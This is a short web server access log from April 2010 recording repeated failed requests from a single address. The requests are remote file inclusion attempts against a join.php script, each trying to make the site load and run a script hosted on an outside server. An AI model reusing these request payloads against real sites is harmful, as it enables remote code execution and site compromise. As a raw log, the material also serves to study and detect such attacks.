116.122.36.61 - - [07/Apr/2010:10:53:53 -0500] "GET //sources/join.php?FORM[url]=http://200.199.242.22/images/.ajim/ajim1.txt???? HTTP/1.1" 404 301 "-""Mozilla/5.0"
116.122.36.61 - - [07/Apr/2010:10:53:53 -0500] "GET /logs//sources/join.php?FORM[url]=http://200.199.242.22/images/.ajim/ajim1.txt???? HTTP/1.1" 404 306 "-""Mozilla/5.0"
116.122.36.61 - - [07/Apr/2010:10:53:53 -0500] "GET /logs/access_log.1219536000//sources/join.php?FORM[url]=http://200.199.242.22/images/.ajim/ajim1.txt???? HTTP/1.1" 404 328 "-""Mozilla/5.0"
116.122.36.61 - - [07/Apr/2010:10:54:55 -0500] "GET /logs/access_log.1252368000//sources/join.php?FORM[url]=http://200.199.242.22/images/.ajim/ajim1.txt???? HTTP/1.1" 404 328 "-""Mozilla/5.0"
116.122.36.61 - - [07/Apr/2010:10:54:55 -0500] "GET //sources/join.php?FORM[url]=http://200.199.242.22/images/.ajim/ajim1.txt???? HTTP/1.1" 404 301 "-""Mozilla/5.0"
116.122.36.61 - - [07/Apr/2010:10:54:55 -0500] "GET /logs//sources/join.php?FORM[url]=http://200.199.242.22/images/.ajim/ajim1.txt???? HTTP/1.1" 404 306 "-""Mozilla/5.0"
116.122.36.61 - - [07/Apr/2010:10:54:55 -0500] "GET /logs/access_log.1219536000//sources/join.php?FORM[url]=http://200.199.242.22/images/.ajim/ajim1.txt???? HTTP/1.1" 404 328 "-""Mozilla/5.0"
